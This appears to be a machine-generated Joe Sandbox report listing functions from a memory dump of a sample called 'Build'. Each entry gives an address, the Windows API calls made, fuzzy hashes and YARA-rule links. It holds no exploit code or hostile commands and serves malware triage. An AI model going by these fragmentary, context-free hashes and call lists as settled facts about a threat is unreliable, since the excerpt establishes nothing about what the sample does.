Opcode Fuzzy Hash: e7583da1a6866fd2c341652a9f4e263ec6866d77fcc8cadb7ca166d89a0e20de
Instruction Fuzzy Hash: D3F0B4316002286BD700EB79AD019EFB3BCEB4D765F41016AFA01E3281DBB4DD418699

Function 00433184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,004331C7,0042D526), ref: 00433191
GetProcessAffinityMask.KERNEL32(00000000,?,004331C7), ref: 00433198

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 19eb0daf84ba379fe25136f3d3e1a9fe4e1158b67e5e11fb4f2e0b5622f932d2
Instruction ID: 8158f624229fb930ef3379967d1660a5e6f60da98b3bf96cad859990fc3639dd
Opcode Fuzzy Hash: 19eb0daf84ba379fe25136f3d3e1a9fe4e1158b67e5e11fb4f2e0b5622f932d2
Instruction Fuzzy Hash: 03E0D832B00205679F098FA49C058EB73EDDA4C216B14517AA503D3300FA3CDE0546A8

Function 004328AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004328D4
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00431309,Crypt32.dll,00000000,00431383,00000200,?,00431366,00000000,00000000,?), ref: 004328F4

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 22298833d2a9bba6c2337a3738d2486f7d759bc86b1c5d47a37243a983cbc065
Instruction ID: 57e905d60844a2ecde73452b263221c6f095751c225184e518a9a82b14d2f8df
Opcode Fuzzy Hash: 22298833d2a9bba6c2337a3738d2486f7d759bc86b1c5d47a37243a983cbc065
Instruction Fuzzy Hash: B4F0BE31A00218BBCB00EB65DD04EDFB3FCEF4CB06F00007AB605D3140DAB8EA848A68

Function 0043CD3F Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,0045505D,000000FF), ref: 0043CD7D
OleUninitialize.OLE32(?,?,?,?,0045505D,000000FF), ref: 0043CD82

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 576c28f7efb20abef0138b2a1b7366b41299c1493e84978702545a8ec574c750
Instruction ID: 292c90cebcc0698d95de06d4798685c2198667ace599768fcb2582a9343f7b5c
Opcode Fuzzy Hash: 576c28f7efb20abef0138b2a1b7366b41299c1493e84978702545a8ec574c750
Instruction Fuzzy Hash: 26F05E76604A44AFC700DF19DD45F5AFBA8FB49B21F10427BE816C37A0DB78A801CA98

Function 0043C34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0043C36E
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0043C375

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 6313c4c5e6d228ca01f529a3a16ba95b937c79316b7266db85bd873387885f73
Instruction ID: a5811289e63e03738a74603a7a81b1824b2f1531bf3de56f616b19715b9c4914
Opcode Fuzzy Hash: 6313c4c5e6d228ca01f529a3a16ba95b937c79316b7266db85bd873387885f73
Instruction Fuzzy Hash: 3BE06D71400208EBDB10DF95C440B9AB7F8EB09314F10C01FE886A3601D378AE849B55

Function 004451AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004451CA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004451D5

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: a567fd8f1d7be0295bfc8970a278f245ccc22995fc613b5fd0435943f5e18762
Instruction ID: a82ecf0c5fb24111759bc8d01d6ac4a86f8cceff7e1394502022fc7f2181c490
Opcode Fuzzy Hash: a567fd8f1d7be0295bfc8970a278f245ccc22995fc613b5fd0435943f5e18762
Instruction Fuzzy Hash: 0DD0A725D44F0056BC107A71280275B275059037793B01A4BE520851C3EA9D5444511F

Function 00421341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00421356
ShowWindow.USER32(00000000), ref: 0042135D

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 2d335be077c07c77862e100a84e37877f1916bba1f0d82645e9bae6ebd5bed2d
Instruction ID: 617bb07ed0365af4cf5d3808445ae17518616a0ff8afa942520d0205c0fefce4
Opcode Fuzzy Hash: 2d335be077c07c77862e100a84e37877f1916bba1f0d82645e9bae6ebd5bed2d
Instruction Fuzzy Hash: 4DC0123205C200BECB010BB0DC1DC2EBBA8EBA4212F20CE28F0B6C1160C239C010EB11

Function 00421B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00421B6A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: af314f853ec3f0fb3426ccf1eb5a1a6be3ff095c8a967a3baea1147859975904
Instruction ID: 4ad3dbbf05fc0fb3503c5d3dfdf11dd15e4a126b211be998aa8fa1c15f64f380
Opcode Fuzzy Hash: af314f853ec3f0fb3426ccf1eb5a1a6be3ff095c8a967a3baea1147859975904
Instruction Fuzzy Hash: A4C1C774B002609BDF24DF25D8847AA7BA1AF25310F5900BBEC069B3A6C778DA44CB59

Function 0042147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00421483

Part of subcall function 00426AE8: __EH_prolog3.LIBCMT ref: 00426AEF

Part of subcall function 0042EE0F: __EH_prolog3.LIBCMT ref: 0042EE16

Part of subcall function 0042668F: __EH_prolog3.LIBCMT ref: 00426696

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: bb6de35d98e898f39340eb16b821a3d2ea9a3b729b8c3e40ffad7de423ceb2a2
Instruction ID: dae0908944a43d0f140aa112d64f1f93fa74a1bf2bbdd98d74aafd04603e5129
Opcode Fuzzy Hash: bb6de35d98e898f39340eb16b821a3d2ea9a3b729b8c3e40ffad7de423ceb2a2
Instruction Fuzzy Hash: 1F4148B0A063808ECB14DF29A4802C97BE1BF59304F4801BEEC4DCF29BD7754255CB66

Function 00435617 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0043561E

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 138fec4f2dce0d5590ba284a6f8c19d5580c1ca779394d2b7f08f3848341bbde
Instruction ID: 33d03dc480e69aaf30301095446d9f9beed192e928f2f86b09413f51e8c9bce3
Opcode Fuzzy Hash: 138fec4f2dce0d5590ba284a6f8c19d5580c1ca779394d2b7f08f3848341bbde
Instruction Fuzzy Hash: 2B21D6B1F41B11ABEB14EFB58C4265B76A8BB08318F54113FE909EB282D7789940C79D

Function 0044D2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0044D348

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: b26dab27595e98fe57f73e885c3e01e6afdfba53d89d03d5c61062b52fb22b7d
Instruction ID: de88e0b3c1ff76434ba4b3cf5f0ea3b120a31940a81f4e7ca0360f20e16be96c
Opcode Fuzzy Hash: b26dab27595e98fe57f73e885c3e01e6afdfba53d89d03d5c61062b52fb22b7d
Instruction Fuzzy Hash: 7D110633E00A259BAB219E29EC4099F7395AB883217164236FD15AB394DA34EC0187DB

Function 0044EAC9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0044D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044B9D3,00000001,00000364,?,0044688D,?,?,004650C4), ref: 0044D7C7

_free.LIBCMT ref: 0044EB35

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction ID: a7d97668f5e7a0bc935943725c6e2a4c890d08497dabe04c20da9c0e070e2866
Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction Fuzzy Hash: 2C01F9726003456BF721CF6AD88195AFBEDFB85370F25052EE59593280EA74B805C778

Function 0042AB81 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0042AB88

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: de4dd2b1430cbea38dd15c10efc2ef6a957e2f7f6322af59c78d737b2ca7c346
Instruction ID: 06c89eace3f0fb3f17ce665c8bae73aa00cdc432e0e8a605982cf20847a26760
Opcode Fuzzy Hash: de4dd2b1430cbea38dd15c10efc2ef6a957e2f7f6322af59c78d737b2ca7c346
Instruction Fuzzy Hash: 3801E536B002395BCB11AE649881AAF7732AF44704B41411FFE11AB341C73C9C10C699

Function 0044D786 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044B9D3,00000001,00000364,?,0044688D,?,?,004650C4), ref: 0044D7C7

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fea4a5066ea66f10dfeb017085e42ce3e1c94d63cdd8f32a05242fb29a2f1d74
Instruction ID: e827ef42c9117b7072e5c45ea9de1fc078d1143009c48f1b37a50965339fd53d
Opcode Fuzzy Hash: fea4a5066ea66f10dfeb017085e42ce3e1c94d63cdd8f32a05242fb29a2f1d74
Instruction Fuzzy Hash: 97F0BE32A40220A6BB216A72AC41B5B7788EF417A0F154167E8099A695CA2CD80186ED

Function 0044BC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00446A24,?,0000015D,?,?,?,?,00447F00,000000FF,00000000,?,?), ref: 0044BCC0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9b34aaea7a27530b66ba4b828fe65a736afd5849c6c4bb8643f4a61664a26ec7
Instruction ID: 5684b34b7599d19193bc57dd60878860926bc66dfcfd579d82e4f39c4e29ae55
Opcode Fuzzy Hash: 9b34aaea7a27530b66ba4b828fe65a736afd5849c6c4bb8643f4a61664a26ec7
Instruction Fuzzy Hash: E3E0393524462256F7222766ACC1B5B3A58DF513A4F16012BAC05A7292CF6DC80282ED

Function 0042AFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,0042AF75,D72E4020,00000000,0045517A,000000FF,?,00428882,?,?), ref: 0042AFEB

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7ddcf6a850303cd50589391dc4914f7f6c8921335247e2aea80b17a44e07ca41
Instruction ID: c3b695e28eba8ab1d97163d38d822ed33112543e3e216db35e23a421ee59628d
Opcode Fuzzy Hash: 7ddcf6a850303cd50589391dc4914f7f6c8921335247e2aea80b17a44e07ca41
Instruction Fuzzy Hash: 33F0B470592B229FDB308A20E558793B7E4AB12325F441B1FC1E3436E0D3B8A58D9645

Function 0042C37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0042C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?,00000000), ref: 0042C4E6
Part of subcall function 0042C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?), ref: 0042C516
Part of subcall function 0042C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?,00000000,0000003A), ref: 0042C522

FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,004287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0042C3A5

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: db9e4c8cb3372ef88f3b6cc4cffc3835c7c9aee55318ec0fbb8b90e99ae4ef02
Instruction ID: 45196ee568dd5683534b502ce65bddcedfc554f411f356187c29177be27149e5
Opcode Fuzzy Hash: db9e4c8cb3372ef88f3b6cc4cffc3835c7c9aee55318ec0fbb8b90e99ae4ef02
Instruction Fuzzy Hash: 39F0E9350083A0AACA2257B568007CB7B915F15336F40CE0FF5FE92192C2B85084DB76

Function 00431421 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00431445

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction ID: 017f81365cac53b7c10c66bb79e0bbc92b8176ed99926fac8f41dc500525aa08
Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction Fuzzy Hash: E4E04F321001406AD321AB1AD804EBFABA99F95724F15881FF59586291CBB9E881CA65

Function 00432EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00432F19

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
